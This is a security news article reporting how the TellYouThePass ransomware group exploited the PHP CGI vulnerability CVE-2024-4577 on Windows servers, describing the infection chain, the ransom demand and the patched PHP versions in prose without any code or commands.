HQ/EMEAFind out how we can help your business
The TellYouThePass ransomware group leveraged the recently patched CVE-2024-4577 remote code execution vulnerability in PHP to deliver webshells and run the encryptor payload on targeted systems.
Based on reports, these ransomware campaigns started earlier this month after PHP’s maintainers released security patches based on publicly available exploit code.
However, TellYouThePass ransomware capitalised on this event, as it is notorious for immediately exploiting publicly available vulnerabilities with widespread impact.
TellYouThePass uses a critical severity vulnerability to execute arbitrary PHP code.
According to investigations, the TellYouThePass ransomware campaign exploits the critical bug CVE-2024-4577 to run arbitrary PHP code. Researchers emphasised that the actors employ the Windows mshta.exe binary to initiate a malicious HTML application (HTA) file.
This file contains VBScript with a base64-encoded string, which decodes into a binary and loads a dot net ransomware variant into the targeted memory.
Upon execution, the virus sends an HTTP request that poses as a CSS resource request to a C2 server while encrypting files on the infected workstation. Next, it leaves a ransom note, “READ_ME10.html,” instructing the victim to restore their files.
TellYouThePass operations have claimed several victims since the start of the month, and the ransom note they used included a request of 0.1 BTC (about $6,700) in exchange for the decryption key.
A separate researcher also discovered that the TellYouThePass ransomware campaign has affected several websites.
On the other hand, experts revealed that CVE-2024-4577 is a severe RCE vulnerability that affects all PHP versions after 5.x. This bug became a threat to relevant parties as it is caused by unsafe character encoding conversions on Windows when utilised in CGI mode.
Researchers identified the vulnerability on May 7 and reported it to the PHP team, which allowed the developers to release the PHP versions 8.3.8, 8.2.20, and 8.1.29 to fix the bug. Subsequently, a proof-of-concept (PoC) exploit code for CVE-2024-4557 was also released a day after the patch.
However, the PoC might have caused a sudden increase in attempted exploits as researchers detected various attempts on the same day of the PoC release. Therefore, entities that still run on the flawed solution should update to its latest version to avoid getting compromised by malicious actors, capitalising on the PoC.
